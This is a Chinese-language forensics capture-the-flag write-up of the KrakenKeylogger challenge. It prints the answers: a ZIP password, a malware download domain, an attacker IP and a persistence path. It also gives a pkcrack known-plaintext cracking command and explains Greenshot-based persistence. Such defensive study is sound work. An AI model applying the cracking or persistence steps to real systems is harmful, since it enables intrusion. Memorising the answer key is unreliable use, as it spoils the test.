KrakenKeylogger Blue Team Challenge

# KrakenKeylogger Blue Team Challenge :::success https://cyberdefenders.org/blueteam-ctf-challenges/119#nav-questions ::: :::info Scenario: An employee at a large company was assigned a task with a two-day deadline. Realizing that he could not complete the task in that timeframe, he sought help from someone else. After one day, he received a notification from that person who informed him that he had managed to finish the assignment and sent it to the employee as a test. However, the person also sent a message to the employee stating that if he wanted the completed assignment, he would have to pay $160. The helper's demand for payment revealed that he was actually a threat actor. The company's digital forensics team was called in to investigate and identify the attacker, determine the extent of the attack, and assess potential data breaches. The team must analyze the employee's computer and communication logs to prevent similar attacks in the future. Tools: [DB Browser](https://sqlitebrowser.org/dl/) [LECmd](https://ericzimmerman.github.io/#!index.md) [Timeline Explorer](https://ericzimmerman.github.io/#!index.md) ::: #### 1. What is the the web messaging app the employee used to talk to the attacker? ``` telegram ``` 題目說明使用web messaging app，所以可以先透過browsing history view查看瀏覽器歷史紀錄，發現有使用telegram。 ![截圖 2023-11-18 下午2.32.48](https://hackmd.io/_uploads/rJhc50BVT.jpg) #### 2. What is the password for the protected ZIP file sent by the attacker to the employee? ``` @1122d ``` 題目中有提供加密的.zip檔project templet test.zip ![截圖 2023-11-19 下午8.15.54](https://hackmd.io/_uploads/Hk9tn_wNa.jpg) 也有提供解密後的檔案projet templet test ![截圖 2023-11-19 下午8.17.03](https://hackmd.io/_uploads/Sk0TnOvV6.jpg) 在有明文的情況下可以利用工具pkcrack進行明文攻擊來破解。將projet templet test壓縮成檔案project.zip後進行破解。這邊要使用題目中提供的7z2301-x64.exe來進行，壓縮工具版本不同可能會導致pkcrack無法成功解密。 :::info └─# ../bin/pkcrack -C /home/kali/Desktop/project\ templet\ test.zip -c our\ project\ templet\ test/our\ project\ templet\ test.docx -P /home/kali/Desktop/project.zip -p project\ templet\ test/our\ project\ templet\ test.docx ::: ![截圖 2023-11-19 下午8.24.40](https://hackmd.io/_uploads/BytqC_wV6.jpg) 成功解密後可以看到密碼是@1122d ![截圖 2023-11-19 下午8.24.53](https://hackmd.io/_uploads/BkEsC_DN6.jpg) 參考資料： https://blog.csdn.net/qq_33265520/article/details/110137117 #### 3. What domain did the attacker use to download the second stage of the malware? ``` masherofmasters.cyou ``` 檢視解壓縮出來的檔案，發現templet.lnk其實一支powershell code ![截圖 2023-11-19 下午8.51.13](https://hackmd.io/_uploads/SJgA4tv4p.jpg) 檢視內容發現他會去某一個位置執行wget，執行下載完的檔案後再將它刪除。而且下載檔案的位置有被編碼過。 ![截圖 2023-11-19 下午9.05.06](https://hackmd.io/_uploads/S1mGuYDV6.jpg) 利用線上powershell執行工具，將前段解碼下載位置的部分執行後write-output出來。 ![截圖 2023-11-19 下午9.49.49](https://hackmd.io/_uploads/Hyntzcw46.jpg) 線上執行powershell工具： https://tio.run/#powershell #### 4. What is the name of the command that the attacker injected using one of the installed LOLAPPS on the machine to achieve persistence? ``` jlhgfjhdflghjhuhuh ``` 先搜尋LOLAPPS，它是一種利用已存在於目標系統的本機工具和服務進行攻擊的手法，屬於無檔案式的攻擊的一中。搜尋中找到了有人已經整理好經常被用來執行LOLAPPS，其中Greenshot就有出現在本次的題目中 ![截圖 2023-11-19 下午10.41.18](https://hackmd.io/_uploads/rJnqAcP4a.jpg) ![截圖 2023-11-19 下午10.53.29](https://hackmd.io/_uploads/SyrO-iw4p.jpg) 查詢它persistence的手法，資料中有提到會去替換Greenshot.ini，增加『ExternalCommand』和對應的參數。 ![截圖 2023-11-19 下午10.51.27](https://hackmd.io/_uploads/HkJW-iPET.jpg) ![截圖 2023-11-19 下午10.56.13](https://hackmd.io/_uploads/SJozMiwNT.jpg) ![截圖 2023-11-19 下午10.58.55](https://hackmd.io/_uploads/HJnhGovET.jpg) 其中可以看到 ``` Commands=MS Paint,jlhgfjhdflghjhuhuh ``` 什麼是LOLAPPS(Living Off The Land Applications)? https://lolapps-project.github.io/ https://www.crowdstrike.com/cybersecurity-101/living-off-the-land-attacks-lotl/ #### 5. What is the complete path of the malicious file that the attacker used to achieve persistence? ``` C:\Users\OMEN\AppData\Local\Temp\templet.lnk ``` 承上題，可以看到Argument.jlhgfjhdflghjhuhuh的位置是C:\Users\OMEN\AppData\Local\Temp\templet.lnk #### 6. What is the name of the application the attacker utilized for data exfiltration? ``` AnyDesk ``` 檢視anydek的log檔案%AppData%\Roaming\AnyDesk\ad.trace，和檔案傳輸相關的紀錄可以用關鍵字files來搜尋： ![截圖 2023-11-24 下午5.25.17](https://hackmd.io/_uploads/B12b3yAV6.jpg) 搜尋的結果會看到很多clipboard_files相關的紀錄，查詢文件之後得知這代表的是用複製貼上的方式進行文件傳輸。 ![截圖 2023-11-24 下午5.21.32](https://hackmd.io/_uploads/Byn7oyCNT.jpg) 參考資料： https://support.anydesk.com/zh-tw/knowledge/advanced-options https://www.inversecos.com/2021/02/forensic-analysis-of-anydesk-logs.html #### 7. What is the IP address of the attacker? ``` 77.232.122.31 ``` 檢視anydek的log檔案%AppData%\Roaming\AnyDesk\ad.trace，可以發現有數筆對外連線的紀錄。主機向外對外連線(Outgoing)的行為會有： ➜ app.session - Connecting to [remote anydesk ID] ➜ anynet.any_socket - Connecting to [remote anydesk ID] ➜ anynet.any_socket - Client-ID: [remote anydesk ID] ➜ anynet.any_socket - Logged in from [IP] ![截圖 2023-11-24 下午4.23.54](https://hackmd.io/_uploads/HJKs606NT.jpg) 和外部IP相關的資訊，也可以用關鍵字External Address去搜尋。 ![截圖 2023-11-24 下午5.18.19](https://hackmd.io/_uploads/H19vqk0Np.jpg) 參考資料： https://support.anydesk.com/knowledge/trace-files https://www.inversecos.com/2021/02/forensic-analysis-of-anydesk-logs.html https://hatsoffsecurity.com/2022/02/28/anydesk-forensic-analysis-and-artefacts/ https://medium.com/mii-cybersec/digital-forensic-artifact-of-anydesk-application-c9b8cfb23ab5